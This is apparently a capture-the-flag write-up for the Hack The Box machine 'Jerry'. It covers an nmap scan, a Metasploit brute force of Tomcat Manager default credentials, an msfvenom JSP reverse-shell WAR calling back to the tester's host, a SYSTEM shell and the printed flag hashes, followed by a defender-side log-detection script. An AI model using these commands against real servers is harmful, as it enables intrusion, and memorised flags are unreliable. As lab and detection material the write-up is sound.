Jerry
Starting with a port scan.
root@n0w4n:~# nmap -n -sS -sV -p- 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 21:16 CEST
Nmap scan report for 10.10.10.95
Host is up (0.026s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.43 seconds
That's not much: only port 8080 is open, and it looks like an Apache Tomcat server is running there. The Tomcat main page shows a version number.
root@n0w4n:~# nmap -O 10.10.10.95
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 21:26 CEST
Nmap scan report for 10.10.10.95
Host is up (0.025s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds
I forgot the -O flag in the first scan. From the HTB page I already knew it was a Windows machine; nmap's best guess is Windows Server 2012 (R2), although it warns the guess is unreliable because it could not find both an open and a closed port.
The Tomcat version shown on the main page is "Version 7.0.88, May 7 2018".
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf auxiliary(scanner/http/tomcat_mgr_login) > run

[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The module found a working credential pair in Metasploit's default Tomcat wordlist: tomcat:s3cret.
Logging in to the Manager application at /manager/html with those credentials gives a page with an option to upload and deploy a WAR file.
root@n0w4n:~/opt/htb/jerry# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=31337 -f war > shell.war
Payload size: 1103 bytes
Final size of war file: 1103 bytes
root@n0w4n:~/opt/htb/jerry# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.95] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>
Wow... that was quick. The shell comes back as nt authority\system straight away, because the Tomcat service itself is running as SYSTEM; there is no privilege escalation step at all.
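As an added defender-side example (not part of the original write-up), the following Python script parses Tomcat access-log lines in the default AccessLogValve format and flags the two events this box turns on: a burst of 401 responses on the Manager login from a single source, and a deploy request by whichever account then authenticated. The log lines are constructed for the example, and the failure threshold is an assumed tuning value.

```python
import re
from collections import Counter

# Default Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that deploy an uploaded application archive.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Constructed sample log (not from the write-up): a guessing burst against the
# Manager login, then a WAR upload by the account that finally authenticated.
SAMPLE_LOG = """\
10.10.14.7 - - [04/Jul/2018:21:40:01 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [04/Jul/2018:21:40:01 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [04/Jul/2018:21:40:02 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [04/Jul/2018:21:40:02 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - - [04/Jul/2018:21:40:03 +0200] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - tomcat [04/Jul/2018:21:40:03 +0200] "GET /manager/html HTTP/1.1" 200 16543
10.10.14.7 - tomcat [04/Jul/2018:21:41:10 +0200] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 16900
10.10.10.20 - - [04/Jul/2018:21:42:00 +0200] "GET /index.jsp HTTP/1.1" 200 11398
"""

def parse(lines):
    # Yield one dict per line that matches the access-log pattern; skip the rest.
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def detect(log_text, fail_threshold=5):
    # fail_threshold is an assumed tuning value: 401s from one source on the
    # Manager app before the burst is reported as credential guessing.
    failures = Counter()
    findings = []
    for e in parse(log_text.splitlines()):
        path = e["path"].split("?", 1)[0]          # drop the query string
        if not path.startswith("/manager/"):
            continue
        status = int(e["status"])
        if status == 401:
            failures[e["host"]] += 1
            if failures[e["host"]] == fail_threshold:   # report once per source
                findings.append({"kind": "manager_bruteforce",
                                 "host": e["host"], "failures": fail_threshold})
        elif path in DEPLOY_PATHS and e["method"] in ("POST", "PUT") and status == 200:
            findings.append({"kind": "war_deploy", "host": e["host"],
                             "user": e["user"], "path": path})
    return findings
```

On the sample log this reports one brute-force burst from 10.10.14.7 followed by a deployment by the user tomcat from the same address; the second finding is the one worth paging on, since a Manager deploy runs with the full privileges of the Tomcat service account.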
Now for the flags.
c:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,616,829,440 bytes free

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
And done.